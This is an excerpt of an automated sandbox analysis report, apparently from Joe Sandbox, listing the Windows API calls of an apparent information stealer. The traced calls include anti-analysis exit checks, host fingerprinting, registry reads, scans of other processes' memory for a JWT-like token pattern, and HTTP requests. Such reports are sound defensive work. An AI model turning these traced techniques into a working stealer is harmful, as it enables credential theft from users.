                                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00B076B9
                                                                                  • HeapFree.KERNEL32(00000000), ref: 00B076C0
                                                                                    • Part of subcall function 00B094A7: vsprintf_s.MSVCRT ref: 00B094C2
                                                                                  • task.LIBCPMTD ref: 00B077BC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Heap$EnumFreeOpenProcessValuetaskvsprintf_s
                                                                                  • String ID:
                                                                                  • API String ID: 700816787-0
                                                                                  • Opcode ID: 5434392e867cfe8b65d60c30634320f59bf744a663cfea390a94abfc30077dd7
                                                                                  • Instruction ID: 66134ffa769353242fd782df13b290bc92828dae64f413fdbd53bff8bdd273d9
                                                                                  • Opcode Fuzzy Hash: 5434392e867cfe8b65d60c30634320f59bf744a663cfea390a94abfc30077dd7
                                                                                  • Instruction Fuzzy Hash: 2F61E8B59442689BDB24DB50CC85BE9BBF8BF54300F0081E9E689A6181DF706FC5CF95
                                                                                  APIs
                                                                                    • Part of subcall function 00B1AA07: lstrcpy.KERNEL32(?,00000000), ref: 00B1AA4D
                                                                                    • Part of subcall function 00B064E7: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 00B06548
                                                                                    • Part of subcall function 00B064E7: StrCmpCA.SHLWAPI(?,0064A480), ref: 00B0656A
                                                                                    • Part of subcall function 00B064E7: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00B0659C
                                                                                    • Part of subcall function 00B064E7: HttpOpenRequestA.WININET(00000000,00421A28,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 00B065EC
                                                                                    • Part of subcall function 00B064E7: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00B06626
                                                                                    • Part of subcall function 00B064E7: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00B06638
                                                                                    • Part of subcall function 00B1AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B1AB6C
                                                                                  • StrCmpCA.SHLWAPI(00000000,0042109C,00000000), ref: 00B1557F
                                                                                  • lstrlen.KERNEL32(00000000), ref: 00B15596
                                                                                    • Part of subcall function 00B19097: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00B190B9
                                                                                  • StrStrA.SHLWAPI(00000000,00000000), ref: 00B155CB
                                                                                  • lstrlen.KERNEL32(00000000), ref: 00B155EA
                                                                                  • strtok.MSVCRT(00000000,?), ref: 00B15605
                                                                                  • lstrlen.KERNEL32(00000000), ref: 00B15615
                                                                                    • Part of subcall function 00B1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B1A9EF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSendstrtok
                                                                                  • String ID:
                                                                                  • API String ID: 3532888709-0
                                                                                  • Opcode ID: ea37f877b7fbbacf1c7384582398939b25ca2f08c2eb8411cf358fbfa571aba2
                                                                                  • Instruction ID: a36eeca1ecc8618dcc36e464ba818dfe1d1c04fdddc78463309d29aa65500446
                                                                                  • Opcode Fuzzy Hash: ea37f877b7fbbacf1c7384582398939b25ca2f08c2eb8411cf358fbfa571aba2
                                                                                  • Instruction Fuzzy Hash: B2512C70511208DBCB18FF64DE92AED7BB5AF50700FD04498F40A66591EB346B85CB52
                                                                                  APIs
                                                                                  • ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 00B17345
                                                                                    • Part of subcall function 00B1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B1A9EF
                                                                                  • OpenProcess.KERNEL32(001FFFFF,00000000,00B17574,004205BD), ref: 00B17383
                                                                                  • memset.MSVCRT ref: 00B173D1
                                                                                  • ??_V@YAXPAX@Z.MSVCRT(?), ref: 00B17525
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: OpenProcesslstrcpymemset
                                                                                  • String ID:
                                                                                  • API String ID: 224852652-0
                                                                                  • Opcode ID: 1aeff6b0bc1cdda16161dcd1e0d48fd3adfd470a7707b0dabfde7a46d1ab6f7a
                                                                                  • Instruction ID: 11c960ba529d88d784bdd3140d698d630869ad53f8ffbd4a662bbc8a7595b7d3
                                                                                  • Opcode Fuzzy Hash: 1aeff6b0bc1cdda16161dcd1e0d48fd3adfd470a7707b0dabfde7a46d1ab6f7a
                                                                                  • Instruction Fuzzy Hash: 4B517DB0D442189BDB14EBA0DC85BEDB7B5EF54305F9040E8E109A7281EF746AC4CF59
                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 004140D5
                                                                                  • RegOpenKeyExA.ADVAPI32(80000001,0090A3D0,00000000,00020119,?), ref: 004140F4
                                                                                  • RegQueryValueExA.ADVAPI32(?,009099E0,00000000,00000000,00000000,000000FF), ref: 00414118
                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00414122
                                                                                  • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414147
                                                                                  • lstrcatA.KERNEL32(?,0090B278), ref: 0041415B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: lstrcat$CloseOpenQueryValuememset
                                                                                  • String ID:
                                                                                  • API String ID: 2623679115-0
                                                                                  • Opcode ID: bc2d94edd70f49bf8f62656b9ca3487d8b5429edb2de975fb07ca5a133c360a1
                                                                                  • Instruction ID: 42b23dca6cf9d61fcd17bb79f48ce0988bb9dd5848c5c15250a36de7d2584b3c
                                                                                  • Opcode Fuzzy Hash: bc2d94edd70f49bf8f62656b9ca3487d8b5429edb2de975fb07ca5a133c360a1
                                                                                  • Instruction Fuzzy Hash: 6941B6BAD402087BDB14EBE0DC46FEE777DAB88304F00455DB61A571C1EA795B888B92
                                                                                  APIs
                                                                                  • strtok_s.MSVCRT ref: 00413588
                                                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                  • strtok_s.MSVCRT ref: 004136D1
                                                                                    • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,009045D8,?,0042110C,?,00000000), ref: 0041A82B
                                                                                    • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: lstrcpystrtok_s$lstrlen
                                                                                  • String ID:
                                                                                  • API String ID: 3184129880-0
                                                                                  • Opcode ID: 64ab5e27dc640e177239ea1b756d4cc1ada2d3f0f35c5ecd3cd97600b2ebe9e7
                                                                                  • Instruction ID: 1d6e97e2126c91d023f3aa3275f065f217875d3b7f18f669bcfd2096c4fc0c60
                                                                                  • Opcode Fuzzy Hash: 64ab5e27dc640e177239ea1b756d4cc1ada2d3f0f35c5ecd3cd97600b2ebe9e7
                                                                                  • Instruction Fuzzy Hash: C34191B1D00108EFCB04EFE5D945AEEB7B4BF44308F00801EE41676291DB789A56CFAA
                                                                                  APIs
                                                                                  • __lock.LIBCMT ref: 0041B39A
                                                                                    • Part of subcall function 0041AFAC: __mtinitlocknum.LIBCMT ref: 0041AFC2
                                                                                    • Part of subcall function 0041AFAC: __amsg_exit.LIBCMT ref: 0041AFCE
                                                                                    • Part of subcall function 0041AFAC: EnterCriticalSection.KERNEL32(?,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041AFD6
                                                                                  • DecodePointer.KERNEL32(0042A138,00000020,0041B4DD,?,00000001,00000000,?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E), ref: 0041B3D6
                                                                                  • DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B3E7
                                                                                    • Part of subcall function 0041BE35: EncodePointer.KERNEL32(00000000,0041C063,004495B8,00000314,00000000,?,?,?,?,?,0041B707,004495B8,Microsoft Visual C++ Runtime Library,00012010), ref: 0041BE37
                                                                                  • DecodePointer.KERNEL32(-00000004,?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B40D
                                                                                  • DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B420
                                                                                  • DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B42A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
                                                                                  • String ID:
                                                                                  • API String ID: 2005412495-0
                                                                                  • Opcode ID: 430bce5bb079d1d45eb37588782b3a2619b50b5e0611126e08e4fa3877c2895d
                                                                                  • Instruction ID: fa90de3286715eaa6817e9c79d9293911763414a7997c4368e9d4f64dee3ff46
                                                                                  • Opcode Fuzzy Hash: 430bce5bb079d1d45eb37588782b3a2619b50b5e0611126e08e4fa3877c2895d
                                                                                  • Instruction Fuzzy Hash: A5314874900309DFDF109FA9C9452DEBAF1FF48314F10802BE454A6262CBB94891DFAE
                                                                                  APIs
                                                                                    • Part of subcall function 00B19AC7: GetProcAddress.KERNEL32(0064A8B0,0064A204), ref: 00B19B08
                                                                                    • Part of subcall function 00B19AC7: GetProcAddress.KERNEL32(0064A8B0,0064A5C8), ref: 00B19B21
                                                                                    • Part of subcall function 00B19AC7: GetProcAddress.KERNEL32(0064A8B0,0064A644), ref: 00B19B39
                                                                                    • Part of subcall function 00B19AC7: GetProcAddress.KERNEL32(0064A8B0,0064A264), ref: 00B19B51
                                                                                    • Part of subcall function 00B19AC7: GetProcAddress.KERNEL32(0064A8B0,0064A250), ref: 00B19B6A
                                                                                    • Part of subcall function 00B19AC7: GetProcAddress.KERNEL32(0064A8B0,0064A2F8), ref: 00B19B82
                                                                                    • Part of subcall function 00B19AC7: GetProcAddress.KERNEL32(0064A8B0,0064A4D4), ref: 00B19B9A
                                                                                    • Part of subcall function 00B19AC7: GetProcAddress.KERNEL32(0064A8B0,0064A33C), ref: 00B19BB3
                                                                                    • Part of subcall function 00B19AC7: GetProcAddress.KERNEL32(0064A8B0,0064A5A0), ref: 00B19BCB
                                                                                    • Part of subcall function 00B19AC7: GetProcAddress.KERNEL32(0064A8B0,0064A548), ref: 00B19BE3
                                                                                    • Part of subcall function 00B19AC7: GetProcAddress.KERNEL32(0064A8B0,0064A3BC), ref: 00B19BFC
                                                                                    • Part of subcall function 00B19AC7: GetProcAddress.KERNEL32(0064A8B0,0064A2E8), ref: 00B19C14
                                                                                    • Part of subcall function 00B19AC7: GetProcAddress.KERNEL32(0064A8B0,0064A60C), ref: 00B19C2C
                                                                                    • Part of subcall function 00B19AC7: GetProcAddress.KERNEL32(0064A8B0,0064A0B0), ref: 00B19C45
                                                                                    • Part of subcall function 00B1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B1A9EF
                                                                                    • Part of subcall function 00B01437: ExitProcess.KERNEL32 ref: 00B01478
                                                                                    • Part of subcall function 00B013C7: GetSystemInfo.KERNEL32(?), ref: 00B013D1
                                                                                    • Part of subcall function 00B013C7: ExitProcess.KERNEL32 ref: 00B013E5
                                                                                    • Part of subcall function 00B01377: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00B01392
                                                                                    • Part of subcall function 00B01377: VirtualAllocExNuma.KERNEL32(00000000), ref: 00B01399
                                                                                    • Part of subcall function 00B01377: ExitProcess.KERNEL32 ref: 00B013AA
                                                                                    • Part of subcall function 00B01487: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00B014A5
                                                                                    • Part of subcall function 00B01487: __aulldiv.LIBCMT ref: 00B014BF
                                                                                    • Part of subcall function 00B01487: __aulldiv.LIBCMT ref: 00B014CD
                                                                                    • Part of subcall function 00B01487: ExitProcess.KERNEL32 ref: 00B014FB
                                                                                    • Part of subcall function 00B169D7: GetUserDefaultLangID.KERNEL32 ref: 00B169DB
                                                                                    • Part of subcall function 00B013F7: ExitProcess.KERNEL32 ref: 00B0142D
                                                                                    • Part of subcall function 00B17AB7: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00B0141E), ref: 00B17AE7
                                                                                    • Part of subcall function 00B17AB7: RtlAllocateHeap.NTDLL(00000000), ref: 00B17AEE
                                                                                    • Part of subcall function 00B17AB7: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00B17B06
                                                                                    • Part of subcall function 00B17B47: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B17B77
                                                                                    • Part of subcall function 00B17B47: RtlAllocateHeap.NTDLL(00000000), ref: 00B17B7E
                                                                                    • Part of subcall function 00B17B47: GetComputerNameA.KERNEL32(?,00000104), ref: 00B17B96
                                                                                    • Part of subcall function 00B1AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B1AC2C
                                                                                    • Part of subcall function 00B1AC17: lstrcpy.KERNEL32(00000000), ref: 00B1AC6B
                                                                                    • Part of subcall function 00B1AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B1AC79
                                                                                    • Part of subcall function 00B1AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B1AB6C
                                                                                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00B16D31
                                                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00B16D4F
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00B16D60
                                                                                  • Sleep.KERNEL32(00001770), ref: 00B16D6B
                                                                                  • CloseHandle.KERNEL32(?,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00B16D81
                                                                                  • ExitProcess.KERNEL32 ref: 00B16D89
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                                                                  • String ID:
                                                                                  • API String ID: 2525456742-0
                                                                                  • Opcode ID: 8bfceb1ee71bfa1add3f5fc1feb3515e0baf2b6ad89577cb8e665fbf230e511d
                                                                                  • Instruction ID: b2d22327f8ac3e0c99b823a6855acc7c1aac60abee9def9e8c4bf65a9001590f
                                                                                  • Opcode Fuzzy Hash: 8bfceb1ee71bfa1add3f5fc1feb3515e0baf2b6ad89577cb8e665fbf230e511d
                                                                                  • Instruction Fuzzy Hash: 43316171A40204ABDB08F7F0DC56FFD7BF5AF14700F9015A8F11262192EF746A84CA62
                                                                                  APIs
                                                                                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                                                                  • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                                                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                                                                  • ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                                                                  • LocalFree.KERNEL32(004102E7), ref: 00409A90
                                                                                  • CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                   • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                                                  • String ID:
                                                                                  • API String ID: 2311089104-0
                                                                                  • Opcode ID: 7104a1ad71f7267fb3f92d709a770ba7d5c34dd003ba373b3d6e6f2e7190c7f7
                                                                                  • Instruction ID: ed52a4b53b9c0591db71eabf51b59360b39b3b260bb7ca760b64e801f0f9a50e
                                                                                  • Opcode Fuzzy Hash: 7104a1ad71f7267fb3f92d709a770ba7d5c34dd003ba373b3d6e6f2e7190c7f7
                                                                                  • Instruction Fuzzy Hash: 02310778A00209EFDB14CF94C985BAEB7B5FF49350F108169E901A7390D778AD41CFA5
                                                                                  APIs
                                                                                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B09C53
                                                                                  • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00B09C78
                                                                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00B09C98
                                                                                  • ReadFile.KERNEL32(000000FF,?,00000000,00B016F6,00000000), ref: 00B09CC1
                                                                                  • LocalFree.KERNEL32(00B016F6), ref: 00B09CF7
                                                                                  • CloseHandle.KERNEL32(000000FF), ref: 00B09D01
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                                                  • String ID:
                                                                                  • API String ID: 2311089104-0
                                                                                  • Opcode ID: c3da04e987efa8c3bc657412c5dcc3be7704e612d0e6c1399905993ce2b8bcb5
                                                                                  • Instruction ID: 88ca19be60a0b345f5e7ee5a3a5af24904ee522ab5665d3eeb20ea8a98e74e6d
                                                                                  • Opcode Fuzzy Hash: c3da04e987efa8c3bc657412c5dcc3be7704e612d0e6c1399905993ce2b8bcb5
                                                                                  • Instruction Fuzzy Hash: 1631E974A40209EFEB24CF94D895BEE7BF5EF49700F108198E915A72D0C774AA41CFA1
                                                                                  APIs
                                                                                  • __getptd.LIBCMT ref: 0041C9EA
                                                                                    • Part of subcall function 0041BF9F: __getptd_noexit.LIBCMT ref: 0041BFA2
                                                                                    • Part of subcall function 0041BF9F: __amsg_exit.LIBCMT ref: 0041BFAF
                                                                                  • __amsg_exit.LIBCMT ref: 0041CA0A
                                                                                  • __lock.LIBCMT ref: 0041CA1A
                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 0041CA37
                                                                                  • free.MSVCRT ref: 0041CA4A
                                                                                  • InterlockedIncrement.KERNEL32(0042B558), ref: 0041CA62
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                   • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
                                                                                  • String ID:
                                                                                  • API String ID: 634100517-0
                                                                                  • Opcode ID: 89c3f3603ea426d8c1dcae7c91f98695ae5431033bc18fad3d55e9ead8607d02
                                                                                  • Instruction ID: 84b4572ca590114782b091576b9a89d8360325c6110713fe167f1eb626e4287d
                                                                                  • Opcode Fuzzy Hash: 89c3f3603ea426d8c1dcae7c91f98695ae5431033bc18fad3d55e9ead8607d02
                                                                                  • Instruction Fuzzy Hash: 5801C431A817299BC722EB669C857DE77A0BF04794F01811BE81467390C72C69D2CBDD
                                                                                  APIs
                                                                                  • __getptd.LIBCMT ref: 00B1CC51
                                                                                    • Part of subcall function 00B1C206: __getptd_noexit.LIBCMT ref: 00B1C209
                                                                                    • Part of subcall function 00B1C206: __amsg_exit.LIBCMT ref: 00B1C216
                                                                                  • __amsg_exit.LIBCMT ref: 00B1CC71
                                                                                  • __lock.LIBCMT ref: 00B1CC81
                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 00B1CC9E
                                                                                  • free.MSVCRT ref: 00B1CCB1
                                                                                  • InterlockedIncrement.KERNEL32(0042B980), ref: 00B1CCC9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
                                                                                  • String ID:
                                                                                  • API String ID: 634100517-0
                                                                                  • Opcode ID: 5d7d5386ca12c030d3e9ef79b035ddd590771242ace2c96a8d9315f1b641efb0
                                                                                  • Instruction ID: 365b9756a65260200758e915f8e87b57bcd0806a3a8768ce2b5b23da83359726
                                                                                  • Opcode Fuzzy Hash: 5d7d5386ca12c030d3e9ef79b035ddd590771242ace2c96a8d9315f1b641efb0
                                                                                  • Instruction Fuzzy Hash: 28010031A81B25ABC720AB649445BDC7FE0FF00750FD40196EC1867290C7346CC1DBD9
                                                                                  APIs
                                                                                  • strlen.MSVCRT ref: 00416F1F
                                                                                  • ??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,0041719A,00000000,65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30,00000000,00000000), ref: 00416F4D
                                                                                    • Part of subcall function 00416BD0: strlen.MSVCRT ref: 00416BE1
                                                                                    • Part of subcall function 00416BD0: strlen.MSVCRT ref: 00416C05
                                                                                  • VirtualQueryEx.KERNEL32(?,00000000,?,0000001C), ref: 00416F92
                                                                                  • ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041719A), ref: 004170B3
                                                                                    • Part of subcall function 00416DE0: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 00416DF8
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                   • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: strlen$MemoryProcessQueryReadVirtual
                                                                                  • String ID: @
                                                                                  • API String ID: 2950663791-2766056989
                                                                                  • Opcode ID: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                                                                  • Instruction ID: da6ee04ed372484ea639f8c5ae6d2cf8ded6d6947598eb42fecba3fc0a9bdd2e
                                                                                  • Opcode Fuzzy Hash: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                                                                  • Instruction Fuzzy Hash: 27511CB5E041099BDB04CF98D981AEFBBB5FF88304F108559F919A7340D738EA51CBA5
                                                                                  APIs
                                                                                  • strlen.MSVCRT ref: 00B17186
                                                                                  • ??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00B17401,00000000,00420BA8,00000000,00000000), ref: 00B171B4
                                                                                    • Part of subcall function 00B16E37: strlen.MSVCRT ref: 00B16E48
                                                                                    • Part of subcall function 00B16E37: strlen.MSVCRT ref: 00B16E6C
                                                                                  • VirtualQueryEx.KERNEL32(00B17574,00000000,?,0000001C), ref: 00B171F9
                                                                                  • ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B17401), ref: 00B1731A
                                                                                    • Part of subcall function 00B17047: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 00B1705F
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: strlen$MemoryProcessQueryReadVirtual
                                                                                  • String ID: @
                                                                                  • API String ID: 2950663791-2766056989
                                                                                  • Opcode ID: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                                                                  • Instruction ID: e69d2bd20210fc7459ffbc51240045780b8e7679139132b7c74159c02a6d8f39
                                                                                  • Opcode Fuzzy Hash: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
